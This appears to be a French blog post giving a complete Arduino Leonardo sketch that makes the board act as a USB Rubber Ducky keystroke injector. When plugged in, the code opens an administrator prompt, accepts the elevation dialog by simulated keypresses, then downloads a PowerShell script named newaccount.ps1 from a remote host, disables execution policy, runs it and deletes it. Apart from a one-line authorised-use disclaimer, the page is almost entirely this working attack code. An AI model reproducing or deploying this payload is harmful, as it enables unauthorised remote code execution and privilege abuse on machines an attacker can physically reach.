Exécution d’un Script Powershell avec une USB Rubber Ducky Arduino Leonardo

Le code ci-dessous est utilisable sur un Arduino Leonardo ou n’importe quel autre device ayant comme chip « MEGA32U4 ». Le script va télécharger sur une URL distante un script powershell, puis va le copier sur le bureau et enfin l’exécuter avant de quitter le Shell.

Utilisé à des fins de pentest un USB Rubber Ducky doit être utilisé sur des matériels dont vous êtes propriétaire ou avec autorisation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
#include "KeyboardAzertyFr.h"
void start() {
  KeyboardAzertyFr.begin();
  rdLongerDelay();
}
void finish() {
  KeyboardAzertyFr.end();
}
void rdDelay() {
  delay(100);
}
void rdLongerDelay() {
  for(int i = 0; i < 5; i++) rdDelay();
}
void rdWriteText(String text) {
  KeyboardAzertyFr.print(text);
  rdDelay();
}
void rdTypeKey(uint8_t key)
{
  KeyboardAzertyFr.press(key);
  rdDelay();
  KeyboardAzertyFr.release(key);
  rdDelay();
}

/***********************
 *      Libraries      *
 ***********************
 * You may remove the  *
 * unused functions    *
 * before uploading    *
 * the code to the     *
 * arduino             *
 ***********************/

/**
 * Runs a program.
 * Example: "notepad" starts notepad, "calc" starts the calculator.
 */
void rdRun(String program) {
  rdGuiCombination('r');
  KeyboardAzertyFr.print(program);
  rdDelay();
  rdTypeKey(KEY_RETURN);
}

/**
 * Takes a screenshot.
 */
void rdPrintScreen() {
  // some machines use 206 key as the PrtScreen key
  // others might use 229, and others might use both so
  // we use both instructions
  rdTypeKey(206);
  rdTypeKey(229);
  KeyboardAzertyFr.print(F("h"));
  rdDelay();
  KeyboardAzertyFr.print(F("b"));
  rdDelay();
}

/**
 * Opens the JavaScript console on a browser.
 */
void rdOpenJavascriptConsole() {
  rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}

/**
 * Hides a window:
 * Basically it drags a window to the lowest it can be
 * and then repositions the cursor.
 */
void rdHideWindow() {
  rdAltCombination(' ');
  KeyboardAzertyFr.print(F("M"));
  rdDelay();
  KeyboardAzertyFr.press(KEY_DOWN_ARROW);
  // 100 should be enough to guarantee the window is as low as possible
  // also please notice that 100 is not the real number of strokes since
  // some of the strokes are ignored.
  for(int i = 0; i < 10; i++) rdLongerDelay();;
  KeyboardAzertyFr.release(KEY_DOWN_ARROW);
  // return repositions the cursor back to its original position
  rdTypeKey(KEY_RETURN);
}

/**
 * Same as Win + D
 */
void rdShowDesktop() {
  rdGuiCombination('d');
}

/**
 * Same as Ctrl + V
 */
void rdPaste() {
  rdCtrlCombination('v');
}

/**
 * Same as Ctrl + X
 */
void rdCut() {
  rdCtrlCombination('x');
}

/**
 * Same as Ctrl + C
 */
void rdCopy() {
  rdCtrlCombination('c');
}

/**
 * Same as Gui + (the received key)
 */
void rdGuiCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_GUI, c);
}

/**
 * Same as Alt + (the received key)
 */
void rdAltCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_ALT, c);
}

/**
 * Same as Ctrl + (the received key)
 */
void rdCtrlCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_CTRL, c);
}

/**
 * Same as Shift + (the received key).
 */
void rdShiftCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_SHIFT, c);
}

/**
 * Same as (Received hold key) + (target key).
 */
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey);
  rdDelay();
  KeyboardAzertyFr.press(targetKey);
  rdDelay();
  KeyboardAzertyFr.releaseAll();
  rdDelay();
}

/**
 * Same as (Received hold key 1) + (received hold key 2) + (target key).
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, targetKey);
}

/**
 * Same as above but with one more hold key.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, holdKey3, targetKey);
}

/**
 * Opens the command prompt without admin rights.
 */
void rdOpenCommandPrompt() {
  rdOpenCommandPrompt(false);
}

/**
 * Opens the command prompt, if the "admin" parameter
 * has a "true value", it opens a command prompt
 * with admin rights. Or without admin rights otherwise.
 */
void rdOpenCommandPrompt(boolean admin) {
  if (admin) {
    rdGuiCombination('x');
    KeyboardAzertyFr.print(F("a"));
    delay(100);
    rdAcceptWindowsSmartScreen();
  } else {
    rdRun("cmd");
  }
}

/**
 * Accepts the windows smart screen to grant admin permissions.
 */
void rdAcceptWindowsSmartScreen() {
  // Wait untill smart screen shows up
  rdLongerDelay();
  rdTypeKey(KEY_LEFT_ARROW);
  rdDelay();
  KeyboardAzertyFr.print(F(" "));
  rdDelay();
}

/**
 * Changes the keyboard layout, if the computer only
 * has 1 keyboard layout this key combination won't
 * do anything.
 */
void rdChangeKeyboardLayout() {
  rdAltCombination(KEY_LEFT_SHIFT);
}

/**
 * It runs one or multiple powershell scripts,
 * to run multiple scripts, separate them with a new line "\n" char.
 */
void rdPowershellRun(String scripts) {
  char delimiter = '
\n';
  String finalScript = "powershell ";
  while (scripts.indexOf('
\n') > 0) {
    finalScript = finalScript + "(" + scripts.substring(0, scripts.indexOf('
\n')) + ") ; ";
    scripts = scripts.substring(scripts.indexOf('
\n') + 1);
  }
  //finalScript = finalScript + "(" + scripts + ")";
  finalScript = finalScript + scripts;
  rdRun(finalScript);
}

void typeKey(int key)
{
  KeyboardAzertyFr.press(key);
  delay(500);
  KeyboardAzertyFr.release(key);
}

/*********************
 *      Arduino      *
 *********************/
// ---------------------------------------------------
//  '
' est le symbole qui désigne un espace, il a la valeur 44
//  Alt Gr azerty                   €                                                                    ~  #  {  [  |  `  \  ^  @    '
'  ]  }  ¤      
//   Shift azerty       Q  B  C  D  E  F  G  H  I  J  K  L  ?  N  O  P  A  R  S  T  U  V  Z  X  Y  Z  1  2  3  4  5  6  7  8  9  0    '
'  °  +  ¨  £  µ  No fr  M  %  NONE  .  /  §    >
//         azerty       q  b  c  d  e  f  g  h  i  j  k  l  ,  n  o  p  a  r  s  t  u  v  z  x  y  z  &  é  "  '
 (  -  è  _  ç  à    ' '  )  =  ^  $  *  No fr  m  ù   ²    ;  :  !    <
//         qwerty       a  b  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v  w  x  y  z  1  2  3  4  5  6  7  8  9  0    ' '  -  =  [  ]  \  No US  ;  '   `    ,  .  /   No US      
//       scancode       4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,  44, 45,46,47,48,49,  50,  51,52, 53,  54,55,56,  100};

void setup() {

   
  start();
  //Ouverture Powershell en administrateur
  rdOpenCommandPrompt(true);
  delay(500);
  //debut de telechargement dun script distant
  KeyboardAzertyFr.print("$output = $env:USERPROFILE");

  //affiche un + pour concat powershell
  KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
  KeyboardAzertyFr.print("=");//affiche un + pour concat
  KeyboardAzertyFr.release(KEY_LEFT_SHIFT);

  KeyboardAzertyFr.print("'
");
 
  // Pour composer le caractère \ dans le path powershell
  // Alt Gr = Ctrl + Alt
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // ou keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
 
   KeyboardAzertyFr.print("
Desktop");
   
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // ou keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
  KeyboardAzertyFr.print("
myscript.ps1';");
  KeyboardAzertyFr.print("Invoke-WebRequest -Uri http://192.168.22.37/newaccount.ps1 -OutFile $output;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");

   delay(500);
   rdTypeKey(KEY_RETURN);

 
  finish();


 
}

void loop() {}



void keyboardScanCode(byte code){
  KeyboardAzertyFr.press(code+136);
  delay(5);
  KeyboardAzertyFr.release(code+136);
}

Laisser un commentaire